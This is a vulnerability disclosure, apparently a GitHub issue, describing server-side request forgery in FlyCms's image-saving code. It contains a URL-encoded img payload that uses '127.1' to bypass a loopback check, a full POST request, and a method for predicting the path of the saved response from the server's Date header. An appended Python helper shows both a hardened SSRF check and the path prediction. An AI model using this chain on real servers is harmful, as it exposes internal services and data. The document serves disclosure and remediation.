
There is a SSRF vulnerability

Open m4yfly opened this issue 6 years ago • 0 comments

An issue was discovered in FlyCms. There is a security vulnerability in the file /Users/bang/code/java/FlyCms-master/src/main/java/com/flycms/module/question/service/ImagesService.java, in the saveUrlAs() function, resulting in SSRF (Server Side Request Forgery): the ability to make requests from the vulnerable server to the intranet/internet.

POC

```
%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E
```

The request sent is as follows:

```http
POST /ucenter/question/add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/question/add
Content-Length: 93
Cookie: CFID=3; CFTOKEN=50139797; ECS[visit_times]=1; bgC_sid=P5rfbe; JSESSIONID=node01jp6c3qjsftrz1xa81ovh47bff0.node0; Hm_lvt_2f24154b3f87697d36a4e2a638b68aaa=1560325064; Hm_lpvt_2f24154b3f87697d36a4e2a638b68aaa=1560328852; FlyCmsId=593f391df8a70cab630e34efa645c590
Connection: close

title=ssrf10&content=%3Cimg%20src%3D%22http%3A%2F%2F127.1%2Findex%22%2F%3E&tags=ssrf7&price=0
```

[screenshot] We can see that it calls replaceContent to fetch the remote image when a question is added.

[screenshot] In the function replaceContent, we can use 127.1 to bypass the regex, or request other URLs directly, and saveUrlAs is called here.

[screenshot] Finally, HttpURLConnection results in the SSRF.

[screenshot] Still in replaceContent, we can find the file path and file name. The addQuestion call finally fails, but the file is still created.

The file path is today's date, for example /upload/content/2019/6/12/. The file name is the concatenation md5(date + filenum) + filenum + extension.

[screenshot] The 16-character md5 is characters 8-24 of the 32-character md5.

[screenshot] We can get the server time from the response; after converting the timezone, we can calculate the result.

[screenshot] So the filename is 43EC4555543DEFC6_0. and the absolute path is /upload/content/2019/6/12/43EC4555543DEFC6_0.

Requesting that path, we can download the file named 43EC4555543DEFC6_0.

[screenshot] It is the SSRF result.

m4yfly, Jun 12 '19 09:06
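Two points in the report above are worth having as working code: why a literal-string check on the host lets `127.1` through (and what a fail-closed check looks like instead), and how the upload path of the fetched response can be predicted from the server's `Date` header. The block below is an added example written for this page; it is not FlyCms code, and it is in Python rather than Java because it is a stand-alone helper. The exact string FlyCms hashes is not stated in the issue (only "md5(date + filenum)"), so the date format (`%Y%m%d` by default), the server timezone (UTC+8 by default) and the `_<filenum>.<ext>` layout inferred from `43EC4555543DEFC6_0.` are assumptions and are parameters.

```python
"""Added example for the FlyCms SSRF issue; not project code.

1. is_internal_target(): canonicalises numeric hosts before deciding, so
   shorthand such as "127.1" cannot slip past a literal blocklist.
2. predict_upload_path(): reproduces the path derivation described in the
   issue from an HTTP Date header. Date format, server timezone and the
   "_<filenum>.<ext>" layout are ASSUMPTIONS, passed as parameters.
"""
import hashlib
import ipaddress
import re
import socket
from datetime import timedelta, timezone
from email.utils import parsedate_to_datetime
from urllib.parse import urlparse

# A literal blocklist of the kind a regex check implements. It only knows
# the spelling "127.0.0.1", so "127.1" or "2130706433" are not matched.
NAIVE_BLOCK = re.compile(r"^(127\.0\.0\.1|localhost|0\.0\.0\.0)$", re.IGNORECASE)


def naive_is_internal(url: str) -> bool:
    """Blocklist check on the raw host string (bypassable, as in the issue)."""
    host = urlparse(url).hostname or ""
    return bool(NAIVE_BLOCK.match(host))


def canonical_ipv4(host: str):
    """Dotted-quad for any IPv4 literal libc's inet_aton accepts
    ("127.1", "127.0.1", "2130706433", ...), or None for a hostname."""
    try:
        return socket.inet_ntoa(socket.inet_aton(host))
    except OSError:
        return None


def is_internal_target(url: str) -> bool:
    """Fail-closed check: True if the URL must not be fetched server-side."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return True                     # file:, gopher:, jar: etc. refused
    host = parts.hostname or ""
    if not host:
        return True
    dotted = canonical_ipv4(host)
    if dotted is not None:
        addrs = [ipaddress.ip_address(dotted)]
    else:
        try:                            # IPv6 literal such as [::1]
            addrs = [ipaddress.ip_address(host)]
        except ValueError:
            try:                        # hostname: check every resolved address
                infos = socket.getaddrinfo(host, None)
                addrs = [ipaddress.ip_address(i[4][0]) for i in infos]
            except (OSError, ValueError):
                return True             # unresolvable (e.g. offline): refuse
    return any(a.is_loopback or a.is_private or a.is_link_local
               or a.is_reserved or a.is_multicast or a.is_unspecified
               for a in addrs)


def md5_16(s: str) -> str:
    """16-char MD5 as the issue describes: chars 8-24 of the 32-char hex digest."""
    return hashlib.md5(s.encode()).hexdigest()[8:24].upper()


def predict_upload_path(date_header: str, filenum: int = 0, ext: str = "",
                        server_tz=timezone(timedelta(hours=8)),   # assumption
                        date_fmt: str = "%Y%m%d") -> str:         # assumption
    """Predict where saveUrlAs() would have written the fetched body.

    date_header is the HTTP Date header (always GMT); it is converted to the
    assumed server timezone, then used for the y/m/d folder (unpadded, as in
    /upload/content/2019/6/12/) and hashed together with filenum.
    """
    local = parsedate_to_datetime(date_header).astimezone(server_tz)
    folder = f"/upload/content/{local.year}/{local.month}/{local.day}/"
    name = f"{md5_16(local.strftime(date_fmt) + str(filenum))}_{filenum}.{ext}"
    return folder + name


if __name__ == "__main__":
    for u in ("http://127.0.0.1/index", "http://127.1/index", "http://[::1]/"):
        print(u, "naive:", naive_is_internal(u), "hardened:", is_internal_target(u))
    # Constructed Date header; not a value captured from the issue.
    print(predict_upload_path("Wed, 12 Jun 2019 01:00:00 GMT", 0, ""))
```

The canonicalisation step is the important part: `inet_aton` accepts the same shorthand forms the JDK's resolver does, so the check sees the address the connection would actually be made to. Two caveats remain for a real fix in `saveUrlAs()`: `HttpURLConnection` follows redirects, so the check has to be repeated on each redirect target, and a hostname should be resolved once and that address pinned for the connection, otherwise a DNS rebinding answer can pass the check and still reach 127.0.0.1.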